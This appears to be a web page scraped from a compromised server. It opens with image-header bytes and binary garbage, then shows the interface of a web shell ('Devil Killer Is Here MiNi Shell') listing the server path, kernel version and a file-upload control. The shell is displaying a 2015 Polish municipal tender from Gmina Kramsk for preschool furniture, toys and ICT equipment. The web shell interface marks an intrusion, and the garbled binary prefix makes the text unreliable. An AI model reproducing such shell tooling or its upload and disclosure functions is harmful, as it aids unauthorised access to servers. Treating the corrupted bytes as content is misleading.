JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150513/111550-N-2015.html

<p class="kh_header"><b>Kramsk: Wyposażenie Oddziałów Przedszkolnych przy Szkołach Podstawowych w Woli Podłężnej, Anielewie, Kramsku i Wysokiem w ramach projektu Modernizacja oddziałów przedszkolnych - podstawą rozwoju nowoczesnej edukacji przedszkolnej w Gminie Kramsk realizowanego przez Gminę Kramsk w ramach Poddziałania 9.1.1 Zmniejszanie nierówności w stopniu upowszechniania  edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki Nr POKL.09.01.01-30-012/14</b><br>
<b>Numer ogłoszenia: 111550 - 2015; data zamieszczenia: 13.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kramsk , ul. Chopina 12, 62-511 Kramsk, woj. wielkopolskie, tel. 063 2470004 w. 28, faks 063 2470311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminakramsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wyposażenie Oddziałów Przedszkolnych przy Szkołach Podstawowych w Woli Podłężnej, Anielewie, Kramsku i Wysokiem w ramach projektu Modernizacja oddziałów przedszkolnych - podstawą rozwoju nowoczesnej edukacji przedszkolnej w Gminie Kramsk realizowanego przez Gminę Kramsk w ramach Poddziałania 9.1.1 Zmniejszanie nierówności w stopniu upowszechniania  edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki Nr POKL.09.01.01-30-012/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z trzech części (1,2,3).1.Część pierwsza zamówienia: 
dostawa i montaż mebli i wyposażenia  do Oddziałów Przedszkolnych: 
a)Oddział Przedszkolny  nr 1 Szkoła Podstawowa w Woli Podłężnej:
(dostawa i montaż: odkurzacz 1 sztuka, froterka 1 sztuka, lodówka 1 sztuka, stoły przedszkolne 5 sztuk, krzesełka dziecięce 20 sztuk, szafka zamykana 3 sztuki, szafka ze schowkami 3 sztuki, regał na zabawki 3 sztuki, wykładzina dywanowa 20 m2, rolety okienne 1 komplet, szafka na ubrania 3 sztuki)
b)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Anielewie: 
(dostawa i montaż: odkurzacz 1 sztuka, froterka 1 sztuka, wózek sprzątający z mopem 1 sztuka, lodówka 1 sztuka, umywalka do mycia rąk z baterią 1 sztuka, stoły przedszkolne 8 sztuk, krzesełka dziecięce 16 sztuk, regał z 2 szafkami 3 sztuki, regał 2 sztuki, biurko dla nauczyciela 1 sztuka, krzesło wysokie 1 sztuka, szafka 2 sztuki, biblioteczka 1 sztuka, szafka na ubrania 3 sztuki, rolety okienne 3 komplety, wykładzina dywanowa 22,50 m2). 
c)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: odkurzacz 1 sztuka, wózek do sprzątania 1 sztuka, mop do sprzątania 2 sztuki, garnki i naczynia 3 komplety, stoły przedszkolne 6 sztuk, krzesełka dziecięce 25 sztuk, biurko dla nauczyciela 1 sztuka, krzesło wysokie 1 sztuka, biblioteczka 1 sztuka, regał z kieszeniami 3 sztuki, szafka na ubrania 3 sztuki).   
d)Oddział Przedszkolny nr 2 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: odkurzacz 1 sztuka, mop do sprzątania 2 sztuki, stoły przedszkolne  6 sztuk, krzesełka dziecięce 25 sztuk, biurko dla nauczyciela 1 sztuka, krzesło wysokie 1 sztuka, biblioteczka 1 sztuka, regał z kieszeniami 3 sztuki, szafka na ubrania 3 sztuki). 
e)Oddział Przedszkolny nr 3 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: odkurzacz 1 sztuka, mop do sprzątania 2 sztuki, stoły przedszkolne  6 sztuk, krzesełka dziecięce 25 sztuk, biurko dla nauczyciela 1 sztuka, biblioteczka 1 sztuka, regał z kieszeniami 3 sztuki, krzesło wysokie 1 sztuka, szafka na ubrania 3 sztuki). 
f)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Kramsku:
(dostawa i montaż: odkurzacz 1 sztuka, karcher 1 sztuka, stoły przedszkolne 4 sztuki, krzesełka dziecięca 25 sztuk, szafka 3 sztuki, rolety okienne 4 sztuki, wykładzina dywanowa 22 m2).
g)Oddział Przedszkolny nr 2 Szkoła Podstawowa w Kramsku:
(dostawa i montaż: odkurzacz 1 sztuka, stoły przedszkolne 4 sztuki, krzesełka dziecięce 25 sztuk, froterka 1 sztuka, szafka  3 sztuki, rolety okienne 4 sztuki, wykładzina dywanowa 25 m2.)
2.Część druga zamówienia: 
dostawa pomocy dydaktycznych i wyposażenia wypoczynkowego do Oddziałów Przedszkolnych: 
a)Oddział Przedszkolny  nr 1 Szkoła Podstawowa w Woli Podłężnej
(dostawa: komplet zabawek 47 zestawów, artykuły plastyczne 70 zestawów, materac do leżenia 12 sztuk, gruszka mała 2 sztuki, wyposażenie zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet)
b)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Anielewie:
(dostawa: komplet zabawek 60 zestawów, artykuły plastyczne 75 zestawów, materac do leżenia 7 sztuk, pomoce dydaktyczne 16 sztuk, pufy 2 zestawy, siedziska poduszki 11 sztuk, wyposażenie zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet).
c)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Wysokiem: 
(dostawa: komplet zabawek 96 kompletów, artykuły plastyczne 75 kompletów, wyposażenie zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet).
d)Oddział Przedszkolny nr 2 Szkoła Podstawowa w Wysokiem:
(dostawa: komplet zabawek 95 zestawów, artykuły plastyczne 104 komplety, materac do leżakowania 12 sztuk, poducha sensoryczna 1 sztuka, gruszka mała 2 sztuki, kanapa mały miś 1 sztuka, komplet wyposażenia zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet.) 
e)Oddział Przedszkolny nr 3 Szkoła Podstawowa w Wysokiem:
(dostawa: komplet zabawek 69 zestawów, artykuły plastyczne 99 zestawów, materac do leżakowania 13 sztuk, poducha sensoryczna 1 sztuka, gruszka mała 2 sztuki, kanapa śpiący miś 1 sztuka, komplet wyposażenia zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet.) 
f)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Kramsku:
(dostawa: komplet zabawek 87 zestawów, artykuły plastyczne 100 zestawów, poducha sensoryczna 1 sztuka, gruszka mała 2 sztuki, kanapa śpiący miś 1 sztuka, komplet wyposażenia zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet.) 
g)Oddział Przedszkolny nr 2 Szkoła Podstawowa w Kramsku:
(dostawa: komplet zabawek 88 zestawów, poducha sensoryczna 1 sztuka, gruszka mała  2 sztuki, kanapa śpiący mis 1 sztuka, komplet wyposażenia zapewniające bezpieczne warunki do opieki nad dziećmi 1 komplet.) 
3.Część trzecia  zamówienia: 
dostawa i wyposażenie w sprzęt ICT, audiowizualny i tablice interaktywne  Oddziałów Przedszkolnych: 
a)Oddział Przedszkolny  nr 1 Szkoła Podstawowa w Woli Podłężnej:
dostawa i montaż: komputer wraz z oprogramowaniem 1 zestaw, monitor 1 sztuka, telewizor 1 sztuka, drukarka 1 sztuka, skaner 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka, kserokopiarka 1 sztuka). 
b)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Anielewie:
(dostawa i montaż: laptop z oprogramowaniem 1 sztuka, DVD 1 sztuka, drukarka 1 sztuka, kamera i aparat HD 1 zestaw, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka, kserokopiarka 1 sztuka).
c)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: komputer z oprogramowaniem 1 sztuka, monitor 1 sztuka, laptop z oprogramowaniem 2 sztuki, drukarka 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem  1 sztuka, kserokopiarka 1 sztuka).
d)Oddział Przedszkolny nr 2 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: komputer z oprogramowaniem 1 sztuka, monitor 1 sztuka, laptop z oprogramowaniem 1 sztuka, drukarka 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka). 
e)Oddział Przedszkolny nr 3 Szkoła Podstawowa w Wysokiem:
(dostawa i montaż: komputer z oprogramowaniem 1 sztuka, monitor 1 sztuka, laptop z oprogramowaniem 1 sztuka, aparat cyfrowy 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka). 
f)Oddział Przedszkolny nr 1 Szkoła Podstawowa w Kramsku:
(dostawa i montaż: kamera HD 1 sztuka, DVD 1 sztuka, laptop z oprogramowaniem 1 sztuka, drukarka 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem CD 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka, kserokopiarka 1 sztuka.) 
g)Oddział Przedszkolny nr 2 Szkoła Podstawowa w Kramsku:
(dostawa i montaż: aparat fotograficzny 1 sztuka, DVD 1 sztuka, laptop z oprogramowaniem 1 sztuka, drukarka 1 sztuka, rzutnik multimedialny 1 sztuka, ekran 1 sztuka, telewizor 1 sztuka, radio z odtwarzaczem 1 sztuka, tablica interaktywna z oprogramowaniem 1 sztuka).
Zamawiający zastrzega, iż wykonawca składający ofertę może przystąpić do maksymalnie dwóch części zamówienia.
Sposób realizacji zamówienia określa wzór umowy stanowiący Załącznik nr  5 do siwz.
Wszystkie materiały, urządzenia i sprzęty winny być równoważne z podanymi w punkcie III. (Szczegółowy opis poszczególnych części zamówienia) niniejszej SIWZ. Za równoważne Zamawiający uzna te, które odpowiadać  będą funkcjom, treściom   i wartościom merytorycznym i estetycznym  dla jakich są przewidziane. 
Zamawiający dopuszcza składanie ofert równoważnych z zastosowaniem innych materiałów i urządzeń niż opisane w punkcie III. (Szczegółowy opis poszczególnych części zamówienia) niniejszej SIWZ, pod warunkiem , iż zagwarantują one uzyskanie parametrów technicznych, eksploatacyjnych, merytorycznych,  jakościowych  i estetycznych nie gorszych od założonych w dokumentacji. Dopuszcza się odstępstwo o około 5% dla parametrów mierzalnych. Wykonawca, który decyduje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego materiały, urządzenia i wyposażenie spełniają określone w SIWZ przez Zamawiającego wymagania. Ciężar udowodnienia, że towar jest równoważny w stosunku do wymogu stawianego przez Zamawiającego spoczywa na wykonawcy składającym ofertę. Wykonawca w takim przypadku musi przedłożyć odpowiednie dokumenty, certyfikaty opisujące parametry techniczno  jakościowe, pozwalające jednoznacznie stwierdzić, że są one równoważne z opisanymi przez Zamawiającego  (pod rygorem odrzucenia oferty). 
Wszystkie dostarczane urządzenia, materiały, pomoce dydaktyczne  oraz wyposażenie powinny zawierać odpowiednie certyfikaty, atesty lub oznaczenia informujące o dopuszczeniu do sprzedaży (jeżeli wymaga tego specyfika urządzenia lub materiału). 
Gwarancje: 
a)	W przypadku wyposażenia meblowego i urządzeń do utrzymania czystości: wykonawca udziela 12 miesięcznej gwarancji na dostarczony sprzęt. 
b)	W przypadku urządzeń ICT, audiowizualnych i tablic interaktywnych: wykonawca udziela 24 miesięcznej gwarancji door to door na dostarczony sprzęt. 
c)	W przypadku urządzeń kopiujących: wykonawca udziela 24 miesięcznej gwarancji i jest on jednocześnie jedynym przedstawicielem serwisowym. Nie dopuszcza się serwisowania dostarczonego sprzętu przez inne podmioty. 
Przedmiot Zamówienia dostarczony Zamawiającemu musi być fabrycznie nowy, wolny od wad, zapakowany w oryginalne opakowanie, nie może posiadać znamion użytkowania, winien spełniać wszelkie wymogi norm określanych obowiązującymi przepisami, w tym jeżeli jest wymagane, dopuszczane do stosowania w placówkach przedszkolnych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 39.15.00.00-8, 37.00.00.00-8, 32.30.00.00-6, 30.00.00.00-9, 48.00.00.00-8, 30.21.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczeniao spełnianiu warunków udziału w postępowaniu  określonych  w art. 22 ust. 1 ustawy Pzp, 
oraz
	1) W przypadku Wykonawców przystępujących do trzeciej części zamówienia Dostawa sprzętu ICT, audiowizualnego i tablic interaktywnych do Oddziałów Przedszkolnych Wykonawca składający ofertę musi być autoryzowanym przedstawicielem handlowym urządzeń kopiująco drukujących. 
Opis sposobu dokonywania oceny spełnienia tego warunku: na podstawie przedłożonych certyfikatów i zaświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp, dla wszystkich Wykonawców składających ofertę 
Oraz 
1) w przypadku Wykonawców  przystępujących do pierwszej części zamówienia: dostawa i montaż mebli i wyposażenia do Oddziałów Przedszkolnych Wykonawca składający ofertę musi wykazać się minimum dwiema  zrealizowanymi  dostawami, na kwotę minimum 30 tys. złotych netto każda, wyposażenia meblowego do oddziałów przedszkolnych w ciągu ostatnich 3 lat. 
Opis sposobu dokonywania oceny spełnienia tego warunku: na podstawie przedłożonych faktur / rachunków  za zrealizowane dostawy 
2) w przypadku Wykonawców przystępujących do drugiej części zamówienia dostawa pomocy dydaktycznych i wyposażenia wypoczynkowego do Oddziałów Przedszkolnych Wykonawca składający ofertę  musi wykazać się minimum dwiema zrealizowanymi dostawami pomocy dydaktycznych do oddziałów przedszkolnych, na kwotę 20 tys. złotych netto każda,   w przeciągu ostatnich 3 lat.
Opis sposobu dokonywania oceny spełnienia tego warunku: na podstawie przedłożonych faktur / rachunków za zrealizowane dostawy. 
3) w przypadku Wykonawców przystępujących do trzeciej części zamówienia  Dostawa sprzętu ICT, audiowizualnego i tablic interaktywnych do Oddziałów Przedszkolnych Wykonawca składający ofertę musi wykazać się minimum dwiema zrealizowanymi dostawami sprzętu ICT oraz sprzętu drukującego na kwotę minimum 100 tys. złotych netto każda,  w ciągu ostatnich 3 lat. 
Opis sposobu dokonywania oceny spełnienia tego warunku: na podstawie przedłożonych faktur / rachunków za zrealizowane dostawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp, - dla wszystkich Wykonawców składających ofertę 
Oraz
1)	w przypadku Wykonawców przystępujących do pierwszej części zamówienia dostawa i montaż mebli do Oddziałów Przedszkolnych Wykonawca składający ofertę musi wykazać się dysponowaniem minimum 1 osobą zdolną do wykonania zamówienia w zakresie dostawy mebli i wyposażenia do oddziałów przedszkolnych oraz minimum   2 osobami  zdolnymi  do rozładunku oraz montażu mebli i wyposażenia do oddziałów przedszkolnych.
 
 Opis sposobu dokonywania oceny spełniania tego warunku:  na podstawie oświadczenia  o spełnianiu wskazanych warunków udziału w postępowaniu sporządzonego na druku Wykonawcy. 

2)	W przypadku wykonawców przystępujących do drugiej części zamówienia :dostawa pomocy dydaktycznych do oddziałów przedszkolnych Wykonawca składający ofertę musi wykazać się minimum 1 osobą zdolną do wykonania zamówienia w zakresie dostawy i rozładunku  pomocy dydaktycznych.
Opis sposobu dokonywania oceny spełnienia tego warunku: na podstawie oświadczenia  o spełnianiu wskazanych warunków udziału w postępowaniu sporządzonego na druku wykonawcy. 
3)	W przypadku wykonawców przystępujących do trzeciej części zamówienia:dostawa sprzętu ICT, audiowizualnego i tablic interaktywnych do oddziałów przedszkolnych Wykonawca składający ofertę musi wykazać się minimum 1 osobą zdolną do przeprowadzenia szkoleń we wszystkich oddziałach przedszkolnych  z zakresu użytkowania dostarczonego sprzętu i wyposażenia oraz minimum 3 osobami serwisującymi urządzenia kopiująco  drukujące.
Opis sposobu dokonywania oceny spełnienia tego warunku : na podstawie oświadczenia  o spełnianiu wskazanych warunków udziału w postępowaniu sporządzonego na druku wykonawcy oraz na podstawie przedłożonych certyfikatów potwierdzających uprawnienia osób do serwisowania urządzeń kopiująco drukujących.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - dla wszystkich Wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto oferta powinna zawierać następujące dokumenty i oświadczenia: formularz ofertowy (zał. nr 1), 
upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie;  
do składanej oferty Wykonawca zobowiązany jest dołączyć opisy, zdjęcia, rysunki proponowanego wyposażenia w formie papierowej jako wydruki załączone do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
